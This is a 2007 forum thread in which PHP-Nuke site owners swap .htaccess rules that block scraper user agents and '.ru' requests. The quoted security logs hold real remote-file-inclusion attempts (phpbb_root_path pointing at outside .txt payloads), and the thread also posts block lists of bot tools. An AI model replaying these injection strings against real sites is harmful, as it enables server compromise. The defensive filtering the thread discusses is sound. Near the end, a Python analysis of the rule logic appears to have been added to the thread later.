sarmient
New Member
Joined: Aug 18, 2005
Posts: 9
Posted: Sat Dec 15, 2007 9:40 am
I want to get rid of this kind of multiple attacks via the htaccess file (successfully blocked with your great Sentinel):
Code:
Date & Time: 2007-12-14 05:52:00 CST GMT -0600
Blocked IP: 72.232.138.195
User ID: Anonymous (1)
Reason: Abuse-Filter
--------------------
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Query String: xxx.xxxxxx.com/modules.php?name=Multiheadlines&rss=ShowInfo&url=http://www.stomol.ru/catalog/afa/azo/
Get String: www.xxxx.com/modules.php?name=Multiheadlines&rss=ShowInfo&url=http://www.stomol.ru/catalog/afa/azo/
Post String: www.xxxx.com/modules.php
Forwarded For: 72.232.138.195
Client IP: none
Remote Address: 85.91.102.138
Remote Port: 63504
Request Method: GET
What is the code for blocking that user agent or the domain *.ru in my .htaccess file?
Actually my .htaccess rewrite section contains the following:
Thanks for Sentinel, phpnuke rules !!
evaders99
Former Moderator in Good Standing
Joined: Apr 30, 2004
Posts: 3221
Posted: Sat Dec 15, 2007 3:29 pm
You could try something like
Code:
RewriteCond %{THE_REQUEST} (.ru)
My syntax may be off. Not 100% sure on this.
sarmient
Posted: Sun Dec 16, 2007 3:51 am
Thanks evaders!
You put me in the right direction; finally my RewriteCond works, although the correct line is:
Code:
RewriteCond %{QUERY_STRING} \.ru
Dawg
RavenNuke(tm) Development Team
Joined: Nov 07, 2003
Posts: 928
Posted: Sun Dec 16, 2007 7:07 am
I picked up this list a while back and thought I would throw this into the discussion....
http://www.javascriptkit.com/howto/htaccess13.shtml
Code:
RewriteCond %{HTTP_USER_AGENT} ^BlackWidow [OR]
RewriteCond %{HTTP_USER_AGENT} ^Bot\ mailto:craftbot@yahoo.com [OR]
RewriteCond %{HTTP_USER_AGENT} ^ChinaClaw [OR]
RewriteCond %{HTTP_USER_AGENT} ^Custo [OR]
RewriteCond %{HTTP_USER_AGENT} ^DISCo [OR]
RewriteCond %{HTTP_USER_AGENT} ^Download\ Demon [OR]
RewriteCond %{HTTP_USER_AGENT} ^eCatch [OR]
RewriteCond %{HTTP_USER_AGENT} ^EirGrabber [OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailSiphon [OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailWolf [OR]
RewriteCond %{HTTP_USER_AGENT} ^Express\ WebPictures [OR]
RewriteCond %{HTTP_USER_AGENT} ^ExtractorPro [OR]
RewriteCond %{HTTP_USER_AGENT} ^EyeNetIE [OR]
RewriteCond %{HTTP_USER_AGENT} ^FlashGet [OR]
RewriteCond %{HTTP_USER_AGENT} ^GetRight [OR]
RewriteCond %{HTTP_USER_AGENT} ^GetWeb! [OR]
RewriteCond %{HTTP_USER_AGENT} ^Go!Zilla [OR]
RewriteCond %{HTTP_USER_AGENT} ^Go-Ahead-Got-It [OR]
RewriteCond %{HTTP_USER_AGENT} ^GrabNet [OR]
RewriteCond %{HTTP_USER_AGENT} ^Grafula [OR]
RewriteCond %{HTTP_USER_AGENT} ^HMView [OR]
RewriteCond %{HTTP_USER_AGENT} HTTrack [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Image\ Stripper [OR]
RewriteCond %{HTTP_USER_AGENT} ^Image\ Sucker [OR]
RewriteCond %{HTTP_USER_AGENT} Indy\ Library [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^InterGET [OR]
RewriteCond %{HTTP_USER_AGENT} ^Internet\ Ninja [OR]
RewriteCond %{HTTP_USER_AGENT} ^JetCar [OR]
RewriteCond %{HTTP_USER_AGENT} ^JOC\ Web\ Spider [OR]
RewriteCond %{HTTP_USER_AGENT} ^larbin [OR]
RewriteCond %{HTTP_USER_AGENT} ^LeechFTP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Mass\ Downloader [OR]
RewriteCond %{HTTP_USER_AGENT} ^MIDown\ tool [OR]
RewriteCond %{HTTP_USER_AGENT} ^Mister\ PiX [OR]
RewriteCond %{HTTP_USER_AGENT} ^Navroad [OR]
RewriteCond %{HTTP_USER_AGENT} ^NearSite [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetAnts [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetSpider [OR]
RewriteCond %{HTTP_USER_AGENT} ^Net\ Vampire [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetZIP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Octopus [OR]
RewriteCond %{HTTP_USER_AGENT} ^Offline\ Explorer [OR]
RewriteCond %{HTTP_USER_AGENT} ^Offline\ Navigator [OR]
RewriteCond %{HTTP_USER_AGENT} ^PageGrabber [OR]
RewriteCond %{HTTP_USER_AGENT} ^Papa\ Foto [OR]
RewriteCond %{HTTP_USER_AGENT} ^pavuk [OR]
RewriteCond %{HTTP_USER_AGENT} ^pcBrowser [OR]
RewriteCond %{HTTP_USER_AGENT} ^RealDownload [OR]
RewriteCond %{HTTP_USER_AGENT} ^ReGet [OR]
RewriteCond %{HTTP_USER_AGENT} ^SiteSnagger [OR]
RewriteCond %{HTTP_USER_AGENT} ^SmartDownload [OR]
RewriteCond %{HTTP_USER_AGENT} ^SuperBot [OR]
RewriteCond %{HTTP_USER_AGENT} ^SuperHTTP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Surfbot [OR]
RewriteCond %{HTTP_USER_AGENT} ^tAkeOut [OR]
RewriteCond %{HTTP_USER_AGENT} ^Teleport\ Pro [OR]
RewriteCond %{HTTP_USER_AGENT} ^VoidEYE [OR]
RewriteCond %{HTTP_USER_AGENT} ^Web\ Image\ Collector [OR]
RewriteCond %{HTTP_USER_AGENT} ^Web\ Sucker [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebAuto [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebCopier [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebFetch [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebGo\ IS [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebLeacher [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebReaper [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebSauger [OR]
RewriteCond %{HTTP_USER_AGENT} ^Website\ eXtractor [OR]
RewriteCond %{HTTP_USER_AGENT} ^Website\ Quester [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebStripper [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebWhacker [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebZIP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Wget [OR]
RewriteCond %{HTTP_USER_AGENT} ^Widow [OR]
RewriteCond %{HTTP_USER_AGENT} ^WWWOFFLE [OR]
RewriteCond %{HTTP_USER_AGENT} ^Xaldon\ WebSpider [OR]
RewriteCond %{HTTP_USER_AGENT} ^Zeus
RewriteRule ^.* - [F,L]
montego
Site Admin
Joined: Aug 29, 2004
Posts: 9457
Location: Arizona
Posted: Tue Dec 18, 2007 5:45 am
I would highly recommend adding the following to this list:
RewriteCond %{HTTP_USER_AGENT} ^Java [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^LWP [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^lwp-trivial [OR]
RewriteCond %{HTTP_USER_AGENT} ^libwww-perl [OR]
RewriteCond %{HTTP_USER_AGENT} ^NaverBot [OR]
RewriteCond %{HTTP_USER_AGENT} ^Twiceler [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Yeti [NC,OR]
Especially the first four...
Dawg
Posted: Tue Dec 18, 2007 5:59 am
Here is the updated list for all you Cut and Pasters....
Code:
RewriteCond %{QUERY_STRING} \.ru
RewriteCond %{HTTP_USER_AGENT} ^Java [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^LWP [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^lwp-trivial [OR]
RewriteCond %{HTTP_USER_AGENT} ^libwww-perl [OR]
RewriteCond %{HTTP_USER_AGENT} ^NaverBot [OR]
RewriteCond %{HTTP_USER_AGENT} ^Twiceler [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Yeti [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^BlackWidow [OR]
RewriteCond %{HTTP_USER_AGENT} ^Bot\ mailto:craftbot@yahoo.com [OR]
RewriteCond %{HTTP_USER_AGENT} ^ChinaClaw [OR]
RewriteCond %{HTTP_USER_AGENT} ^Custo [OR]
RewriteCond %{HTTP_USER_AGENT} ^DISCo [OR]
RewriteCond %{HTTP_USER_AGENT} ^Download\ Demon [OR]
RewriteCond %{HTTP_USER_AGENT} ^eCatch [OR]
RewriteCond %{HTTP_USER_AGENT} ^EirGrabber [OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailSiphon [OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailWolf [OR]
RewriteCond %{HTTP_USER_AGENT} ^Express\ WebPictures [OR]
RewriteCond %{HTTP_USER_AGENT} ^ExtractorPro [OR]
RewriteCond %{HTTP_USER_AGENT} ^EyeNetIE [OR]
RewriteCond %{HTTP_USER_AGENT} ^FlashGet [OR]
RewriteCond %{HTTP_USER_AGENT} ^GetRight [OR]
RewriteCond %{HTTP_USER_AGENT} ^GetWeb! [OR]
RewriteCond %{HTTP_USER_AGENT} ^Go!Zilla [OR]
RewriteCond %{HTTP_USER_AGENT} ^Go-Ahead-Got-It [OR]
RewriteCond %{HTTP_USER_AGENT} ^GrabNet [OR]
RewriteCond %{HTTP_USER_AGENT} ^Grafula [OR]
RewriteCond %{HTTP_USER_AGENT} ^HMView [OR]
RewriteCond %{HTTP_USER_AGENT} HTTrack [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Image\ Stripper [OR]
RewriteCond %{HTTP_USER_AGENT} ^Image\ Sucker [OR]
RewriteCond %{HTTP_USER_AGENT} Indy\ Library [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^InterGET [OR]
RewriteCond %{HTTP_USER_AGENT} ^Internet\ Ninja [OR]
RewriteCond %{HTTP_USER_AGENT} ^JetCar [OR]
RewriteCond %{HTTP_USER_AGENT} ^JOC\ Web\ Spider [OR]
RewriteCond %{HTTP_USER_AGENT} ^larbin [OR]
RewriteCond %{HTTP_USER_AGENT} ^LeechFTP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Mass\ Downloader [OR]
RewriteCond %{HTTP_USER_AGENT} ^MIDown\ tool [OR]
RewriteCond %{HTTP_USER_AGENT} ^Mister\ PiX [OR]
RewriteCond %{HTTP_USER_AGENT} ^Navroad [OR]
RewriteCond %{HTTP_USER_AGENT} ^NearSite [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetAnts [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetSpider [OR]
RewriteCond %{HTTP_USER_AGENT} ^Net\ Vampire [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetZIP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Octopus [OR]
RewriteCond %{HTTP_USER_AGENT} ^Offline\ Explorer [OR]
RewriteCond %{HTTP_USER_AGENT} ^Offline\ Navigator [OR]
RewriteCond %{HTTP_USER_AGENT} ^PageGrabber [OR]
RewriteCond %{HTTP_USER_AGENT} ^Papa\ Foto [OR]
RewriteCond %{HTTP_USER_AGENT} ^pavuk [OR]
RewriteCond %{HTTP_USER_AGENT} ^pcBrowser [OR]
RewriteCond %{HTTP_USER_AGENT} ^RealDownload [OR]
RewriteCond %{HTTP_USER_AGENT} ^ReGet [OR]
RewriteCond %{HTTP_USER_AGENT} ^SiteSnagger [OR]
RewriteCond %{HTTP_USER_AGENT} ^SmartDownload [OR]
RewriteCond %{HTTP_USER_AGENT} ^SuperBot [OR]
RewriteCond %{HTTP_USER_AGENT} ^SuperHTTP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Surfbot [OR]
RewriteCond %{HTTP_USER_AGENT} ^tAkeOut [OR]
RewriteCond %{HTTP_USER_AGENT} ^Teleport\ Pro [OR]
RewriteCond %{HTTP_USER_AGENT} ^VoidEYE [OR]
RewriteCond %{HTTP_USER_AGENT} ^Web\ Image\ Collector [OR]
RewriteCond %{HTTP_USER_AGENT} ^Web\ Sucker [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebAuto [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebCopier [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebFetch [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebGo\ IS [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebLeacher [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebReaper [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebSauger [OR]
RewriteCond %{HTTP_USER_AGENT} ^Website\ eXtractor [OR]
RewriteCond %{HTTP_USER_AGENT} ^Website\ Quester [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebStripper [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebWhacker [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebZIP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Wget [OR]
RewriteCond %{HTTP_USER_AGENT} ^Widow [OR]
RewriteCond %{HTTP_USER_AGENT} ^WWWOFFLE [OR]
RewriteCond %{HTTP_USER_AGENT} ^Xaldon\ WebSpider [OR]
RewriteCond %{HTTP_USER_AGENT} ^Zeus
sarmient
Posted: Tue Dec 18, 2007 1:21 pm
Nice list, thanks a lot. I think the htaccess blocking is a great pre-filter for Sentinel.
redhairz
Worker
Joined: Nov 17, 2006
Posts: 222
Posted: Fri Dec 21, 2007 6:58 am
Thanks for sharing guys
_________________ Jesus is Alive, He is our joy, be it good times or bad time.
CodyG
Life Cycles Becoming CPU Cycles
Joined: Jan 02, 2003
Posts: 714
Location: Vancouver Island
Posted: Fri Dec 21, 2007 8:20 am
Does it work if only the root dir .htaccess has these blocks? Or is it required for all .htaccess in all dirs?
_________________ "We want to see if life is ubiquitous." D.Goldin
montego
Posted: Fri Dec 21, 2007 9:20 am
.htaccess is "inherited" all the way down the "tree". So, as long as you do not override a particular statement / setting down below, it will apply.
gotcha
Regular
Joined: Mar 14, 2005
Posts: 91
Posted: Sat Dec 22, 2007 5:16 pm
montego wrote:
I would highly recommend adding the following to this list:
RewriteCond %{HTTP_USER_AGENT} ^Java [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^LWP [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^lwp-trivial [OR]
RewriteCond %{HTTP_USER_AGENT} ^libwww-perl [OR]
RewriteCond %{HTTP_USER_AGENT} ^NaverBot [OR]
RewriteCond %{HTTP_USER_AGENT} ^Twiceler [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Yeti [NC,OR]
Especially the first four...

Nice one...
I've seen the Twiceler and Yeti but didn't know they weren't good bots.
So where do we find out if a bot is bad?
warren-the-ape
Worker
Joined: Nov 19, 2007
Posts: 196
Location: Netherlands
Posted: Sat Dec 22, 2007 5:38 pm
*NukeSentinel Newbie here
Could I just put this in my .htaccess file below the
Code:
# -------------------------------------------
# Start of NukeSentinel(tm) DENY FROM area
# -------------------------------------------
part?
I know it has nothing to do with NS particularly, but dunno if it could mess things up? + How do I check if this would be working correctly?
montego
Posted: Sat Dec 22, 2007 7:52 pm
warren-the-ape, no, you CANNOT put these after those lines. I would suggest before those comments. Edit: Actually, thinking about that, you technically "could", but it would be best if you just put it above.
gotcha, I should probably have removed those two from the file. They were not obeying my robots.txt and I personally do not like that, so, they get banned... No strike1, strike2... [link hidden by the board] is a handy site, but I also just Google for it and usually end up finding a wealth of info.
warren-the-ape
Posted: Sun Dec 23, 2007 8:42 am
Thnx montego
Btw, I already received 8 'blocked abuse' emails within 2 days, so it seems like Sentinel is doing its job.
They are similar to the ones described by sarmient;
Code:
Date & Time: 2007-12-23 15:04:46 CET GMT +0100
Blocked IP: 81.52.241.10
User ID: Anonymous (1)
Reason: Abuse-Filter
--------------------
User Agent: libwww-perl/5.808
Query String: mysite.com/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.mta.cl/galeria2/galery.txt?
Get String: mysite.com/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.mta.cl/galeria2/galery.txt?
Post String: mysite.com/modules/Forums/admin/admin_styles.php
Forwarded For: none
Client IP: none
Remote Address: 81.52.241.10
Remote Port: 53788
Request Method: GET
I've set my 'Filters Blockers settings' to; email & default page
But is this enough or should I block them as well?
I also got 1 mail from a blocked member where his entire post content was listed, I think he probably made a html mistake or something like that.
EDIT: If I configure it to block (email, block, default page) those attacks as well, would that classify as a 'shameful hacker caught'?
gotcha
Posted: Sun Dec 23, 2007 10:08 am
Quote:
They were not obeying my robots.txt and I personally do not like that, so, they get banned

I'm surprised neither of them has fallen into my bot trap. I added an entry to the robots.txt that points to a page that will ban them immediately (via Sentinel).
Guardian2003
Site Admin
Joined: Aug 28, 2003
Posts: 6799
Location: Ha Noi, Viet Nam
Posted: Sun Dec 23, 2007 2:57 pm
I daren't post my htaccess lol, the forum might throw a fit.
You might want to research one that's doing the rounds at the moment;
MJ12 (Majestic12) - there is a good bot by this name, but one is usually spoofed and the stuff it is searching for doesn't exist, so basically it is looking for exploits.
sowsteady
Regular
Joined: Apr 09, 2004
Posts: 87
Location: UK
Posted: Mon Dec 24, 2007 5:56 am
Perhaps I did something wrong, but after cut-n-pasting what Dawg posted above, I'm still getting these script-kiddie attacks from both an .ru domain and using libwww-perl.
Did I miss something?
User Agent: libwww-perl/5.803
Query String: a1nul.com/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????????
Get String: a1nul.com/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????????
Post String: a1nul.com/modules/Forums/admin/admin_db_utilities.php
Forwarded For: none
Client IP: none
Remote Address: 69.33.187.52
Remote Port: 60337
Request Method: GET
montego
Posted: Mon Dec 24, 2007 7:51 am
sowsteady, I think you may be missing the last line of the list (Dawg did not have it in his updated list):
RewriteRule ^.*$ http://127.0.0.1 [R,L]
Make sure this is at the end of your list. I just think you did not complete the rewrite so they were just still passing into nuke.
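To see what that rewrite chain actually does, here is an added Python model of how mod_rewrite evaluates a RewriteCond chain (my example, not code from the forum, NukeSentinel or Apache; it uses a constructed, abridged copy of the list above and requests modelled on the Sentinel entries quoted in this thread). Besides montego's point that nothing is blocked without the closing RewriteRule, it goes one step further: a RewriteCond without an [OR] flag is AND-ed with the group after it, so the .ru query-string line as posted only fires when the user agent also matches.

```python
import re

# Constructed, abridged stand-in for the thread's list (added example, not the
# forum's file). BLOCK_A keeps the .ru line as posted (no [OR]); BLOCK_B adds [OR].
BLOCK_A = r"""
RewriteCond %{QUERY_STRING} \.ru
RewriteCond %{HTTP_USER_AGENT} ^Java [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^libwww-perl [OR]
RewriteCond %{HTTP_USER_AGENT} HTTrack [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Zeus
RewriteRule ^.* - [F,L]
"""
BLOCK_B = BLOCK_A.replace(r"\.ru", r"\.ru [OR]")

# Toy tokenizer: the pattern is one non-space token (no "Teleport\ Pro" escapes).
COND_RE = re.compile(r"^RewriteCond\s+%\{(\w+)\}\s+(\S+)(?:\s+\[([^\]]*)\])?$")

def parse(text):
    """Return (conds, rule): conds as (server_var, regex, set-of-flags)."""
    conds, rule = [], None
    for line in text.strip().splitlines():
        m = COND_RE.match(line.strip())
        if m:
            var, pat, flags = m.groups()
            conds.append((var, pat, set((flags or "").upper().split(","))))
        elif line.strip().startswith("RewriteRule"):
            rule = line.strip()
    return conds, rule

def is_blocked(text, request):
    """mod_rewrite semantics: a run of [OR] conds forms one group, and the
    groups are AND-ed; with no RewriteRule the conditions never fire."""
    conds, rule = parse(text)
    if rule is None:
        return False
    verdict, group_hit = True, False
    for var, pat, flags in conds:
        nc = re.IGNORECASE if "NC" in flags else 0
        group_hit = group_hit or re.search(pat, request.get(var, ""), nc) is not None
        if "OR" not in flags:          # group closed: AND it into the verdict
            verdict, group_hit = verdict and group_hit, False
    return verdict

# Constructed requests modelled on the Sentinel entries quoted in the thread.
PERL_RU = {"HTTP_USER_AGENT": "libwww-perl/5.803",
           "QUERY_STRING": "phpbb_root_path=http://www.dip-kostroma.ru/x.txt?"}
MSIE_RU = {"HTTP_USER_AGENT": "Mozilla/4.0 (compatible; MSIE 6.0)",
           "QUERY_STRING": "name=Multiheadlines&url=http://www.stomol.ru/"}
NORMAL = {"HTTP_USER_AGENT": "Mozilla/5.0", "QUERY_STRING": "name=Forums"}
```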
sowsteady
Posted: Mon Dec 24, 2007 9:01 am
Oh right, I'll go fix it. Thanks Montego!
montego
Posted: Wed Dec 26, 2007 9:35 am
No problem.